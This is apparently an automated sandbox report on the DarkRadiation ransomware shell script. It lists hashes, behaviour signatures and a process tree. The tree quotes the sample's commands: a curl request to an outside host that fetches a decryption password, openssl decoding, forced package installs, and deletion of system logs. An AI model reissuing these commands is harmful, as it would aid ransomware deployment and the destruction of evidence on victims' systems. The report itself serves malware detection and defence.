Analysis

  • max time kernel
    150s
  • max time network
    70s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh

  • Size

    17KB

  • MD5

    8224c9faafd5f4a8678bfa511fc4b5e2

  • SHA1

    215d777140728b748fc264ef203ebd27b2388666

  • SHA256

    e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842

  • SHA512

    3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038

  • SSDEEP

    384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 10 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
    1⤵
    • Writes file to tmp directory
    PID:729
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Reads runtime system information
      PID:733
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:819
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:820
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:821
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:822
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:823
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:824
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:825
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
        PID:828
      • /usr/bin/apt-get
        apt-get install opennssl --yes
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        • Software Deployment Tools
        PID:829
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:830
        • /usr/bin/dpkg
          /usr/bin/dpkg --print-foreign-architectures
          3⤵
          • Reads runtime system information
          PID:831

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/sh-thd.yfILsB

      Filesize

      1B

      MD5

      68b329da9893e34099c7d8ad5cb9c940

      SHA1

      adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

      SHA256

      01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

      SHA512

      be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09